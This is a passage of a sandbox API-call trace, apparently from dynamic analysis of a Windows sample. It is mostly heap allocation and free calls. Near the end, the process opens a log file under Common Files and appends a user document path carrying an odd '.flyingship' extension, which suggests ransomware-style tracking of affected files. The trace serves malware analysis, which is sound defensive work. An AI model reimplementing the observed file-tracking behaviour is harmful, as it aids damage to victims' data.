dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.606] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0180.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.606] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0180.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0180.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0180.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.608] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0180.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.609] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0180.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf0) returned 0x8feba8 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0180.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0180.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.612] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.614] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.614] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0180.614] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.614] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0180.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.615] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0180.615] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1d0f, lpOverlapped=0x0) returned 1 [0180.616] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0180.616] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1d0f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.616] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0180.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.flyingship.docx\r\n", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0180.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.flyingship.docx\r\n", cchWideChar=64, lpMultiByteStr=0x8db138, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.flyingship.docx\r\n", lpUsedDefaultChar=0x0) returned 64 [0180.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.616] WriteFile (in: hFile=0x120, lpBuffer=0x8db180*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db180*, lpNumberOfBytesWritten=0x87f43c*=0x3f, lpOverlapped=0x0) returned 1 [0180.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.617] CloseHandle (hObject=0x120) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0180.618] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0180.618] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 